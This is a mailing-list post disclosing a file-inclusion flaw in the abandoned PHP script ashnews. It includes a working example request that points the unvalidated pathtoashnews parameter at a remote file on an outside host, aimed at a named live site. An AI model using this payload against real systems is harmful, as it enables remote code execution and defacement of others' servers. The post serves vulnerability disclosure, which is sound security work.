Re: [Full-disclosure] ashnews Cross-Site Scripting Vulnerability

Hi,

Dan B UK wrote:

> Due to the nature of the issue I am not disclosing the detail of it 
> until the writer of the software has updated it; maybe you could have 
> waited??
>
> A vulnerability that allows privileges of the apache user within the 
> limitations of how much PHP has been locked down.


Since the author of the product has got back to me with the following I 
think it is ok to disclose the issue now.

"That is a known error. Unfortunately I have completely abondoned 
ashnews. In fact, I have been neglecting taking it down completely which 
I am going to do right now. - Derek"

The issue is in the handling of the $pathtoashnews, it is not validated 
before being used by the script. Allowing remote or local file inclusion.

eg: 
http://dosko.nl/news/ashnews.php?pathtoashnews=http://f-box.org/~dan/inc.inc?
( The ? is required to make the remote server (f-box.org) ignore the 
string that is appended to the variable $pathtoashnews )
( The website that is in the example above has already been defaced! )

Cheers,
DanB UK.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/